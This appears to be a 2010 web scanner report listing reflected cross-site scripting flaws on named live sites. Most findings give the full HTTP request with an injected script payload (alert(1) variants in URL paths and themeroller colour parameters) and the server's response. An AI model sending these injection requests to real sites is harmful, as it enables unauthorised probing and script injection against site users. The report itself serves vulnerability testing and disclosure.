GET /xml/poll-link?82efb"-alert(1)-"694f25fe67=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:34 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:58 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22070
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 11905<script>alert(1)</script>ed7f0af6221 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /servlet11905<script>alert(1)</script>ed7f0af6221/ajrotator/ HTTP/1.1 Host: hpi.rotator.hadj7.adjuggler.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Mon, 15 Nov 2010 02:07:45 GMT Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /servlet11905<script>alert(1)</script>ed7f0af6221/ajrotator/ not found</pre> <BR>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2c2fc<script>alert(1)</script>bfbfed47bf1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /servlet/ajrotator2c2fc<script>alert(1)</script>bfbfed47bf1/ HTTP/1.1 Host: hpi.rotator.hadj7.adjuggler.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Mon, 15 Nov 2010 02:07:45 GMT Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /servlet/ajrotator2c2fc<script>alert(1)</script>bfbfed47bf1/ not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload df060<script>alert(1)</script>065331fd6cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 760f3<script>alert(1)</script>595ff3ead2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the pubclick request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30b7c'-alert(1)-'7a94292f04 was submitted in the pubclick parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 892af"%3balert(1)//60d6637fe36 was submitted in the mpck parameter. This input was echoed as 892af";alert(1)//60d6637fe36 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c44c0"><script>alert(1)</script>907f9db44a1 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e58c7"%3balert(1)//4841a3488a4 was submitted in the mpvc parameter. This input was echoed as e58c7";alert(1)//4841a3488a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 715f3"><script>alert(1)</script>d0be7b9b1b0 was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73316"><script>alert(1)</script>6045c0d1b5 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a73316"><script>alert(1)</script>6045c0d1b5&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:34 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120127
The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15638"><script>alert(1)</script>d1337495d25 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f715638"><script>alert(1)</script>d1337495d25&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:13 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51bf5"><script>alert(1)</script>5b6241fd956 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d851bf5"><script>alert(1)</script>5b6241fd956&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:20 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83a5c"><script>alert(1)</script>aafa9f7e456 was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec83a5c"><script>alert(1)</script>aafa9f7e456&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:47 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71047"><script>alert(1)</script>322de3bc4ee was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E671047"><script>alert(1)</script>322de3bc4ee&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:06 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe0cc"><script>alert(1)</script>05af9fa5873 was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88fe0cc"><script>alert(1)</script>05af9fa5873&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4cf7"><script>alert(1)</script>bd812dcb8db was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1dfc4cf7"><script>alert(1)</script>bd812dcb8db&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:27 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0062"><script>alert(1)</script>44c898d98f6 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaac0062"><script>alert(1)</script>44c898d98f6&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:59 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99072"><script>alert(1)</script>6e4b3546877 was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa99072"><script>alert(1)</script>6e4b3546877&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:10:35 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e233d"><script>alert(1)</script>dfa3cab4bb9 was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100e233d"><script>alert(1)</script>dfa3cab4bb9&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Mon, 15 Nov 2010 02:09:36 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120130
The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f79f"><script>alert(1)</script>2687cae33c8 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=1004f79f"><script>alert(1)</script>2687cae33c8&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
